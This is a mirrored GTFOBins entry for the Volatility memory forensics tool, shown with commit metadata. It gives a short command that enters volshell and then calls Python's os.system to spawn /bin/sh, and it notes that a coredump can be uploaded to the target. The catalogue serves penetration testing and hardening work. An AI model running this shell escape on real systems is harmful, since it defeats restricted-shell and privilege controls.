1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/volatility.md
Lemon c056acd2e2
Add volatility
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-02-19 14:33:17 +01:00

338 B

description functions
This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply.
shell
code
volatility -f file.dump volshell __import__('os').system('/bin/sh')